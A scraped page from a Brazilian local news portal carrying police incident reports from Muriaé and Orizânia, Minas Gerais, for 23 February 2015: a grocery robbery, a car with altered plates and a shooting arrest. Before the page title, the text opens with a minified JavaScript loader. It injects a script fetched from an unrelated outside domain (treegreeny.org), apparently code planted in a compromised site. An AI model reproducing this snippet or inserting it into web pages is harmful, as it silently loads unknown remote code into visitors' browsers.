;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais 24/02/2015. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais 24/02/2015.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 24/02/2015

76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO POR ROUBO TENTADO À MERCEARIA NO DISTRITO DE BOA FAMÍLIA EM MURIAÉ

Em 23/02/2015, por volta das 16h15min, na Rua Marciano Ferreira Neto, no distrito de Boa Família, M.C.S., de 26 anos, relatou que dois indivíduos chegaram na MERCEARIA COIMBRA, em uma motocicleta e um deles de arma em punho roubou cerca de R$ 150,00 e evadiram. V.C.S., de 21 anos, que presenciou o crime foi atrás dos autores em seu veículo, momento em que, para se defender de um possível disparo, abaixou na direção do veículo ocorrendo a colisão com a motocicleta YAMAHA YBR cor preta, dos autores e um terceiro veículo, VW GOL que estava estacionado. Que os autores caíram ao solo e logo se levantaram e embrenharam-se em um matagal abandonando o material do roubo e a motocicleta. No local, foi encontrada uma carteira com os documentos pessoais do autor M.S.M., de 20 anos. Em rastreamento, por volta das 19:00 horas, este autor e E.S.F., de 17 anos, foram localizados próximo à FAZENDA MUNDIAL, os quais assumiram a autoria do crime e informaram a localização da espingarda tipo poveira de fabricação artesanal. Os autores foram encaminhados ao HSP onde foram medicados e conduzidos à DPJ.
PM APREENDE VEÍCULO COM NUMERAÇÃO E PLACAS ADULTERADAS EM MURIAÉ

Em 23/02/2015, por volta das 17h30min, na Rua Coronel Marciano Rodrigues, no Centro, militares depararam com o veículo RENAULT/CLIO, cor preta, placa de SÃO PAULO-SP, estacionado, sendo constatado que a placa pertence a um veículo FIAT/STILO, cor vermelha, de OSASCO-SP. A numeração / chassi que consta nos vidros do veículo são diferentes. O proprietário ou condutor do veículo não foi localizado, populares apenas disseram que um cidadão de cor morena, estatura média/alta estaciona tal veículo pela manhã e o retira à noite quase todos os dias. Veículo removido ao pátio credenciado.

75ª CIA PM – CARANGOLA-MG

PM EFETUA PRISÃO POR LESÃO CORPORAL E PORTE ILEGAL DE ARMA DE FOGO EM ORIZÂNIA

Em 23/02/2015, por volta das 20h10min, na Rua José Rodrigues Damasceno, no Centro, militares receberam informações que o autor R.F.A.F.G., de 20 anos, estava efetuando disparos em via pública. No local, depararam com a vítima F.S.G., de 33 anos, afirmando ter sido atingida por um dos disparos, então foi socorrido ao hospital. Em rastreamento, o autor, ao avistar a gurp, empreendeu fuga em meio a um matagal. Posteriormente, militares aguardaram nas proximidades da residência do autor e este retornou sendo então surpreendido. Tentou novamente fugir, contudo foi preso e conduzido à DPJ. Foi apreendido um revólver cal. 22 ROSSI, 02 munições picotadas e 05 cartuchos vazios. A vítima permanece internada e consciente.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.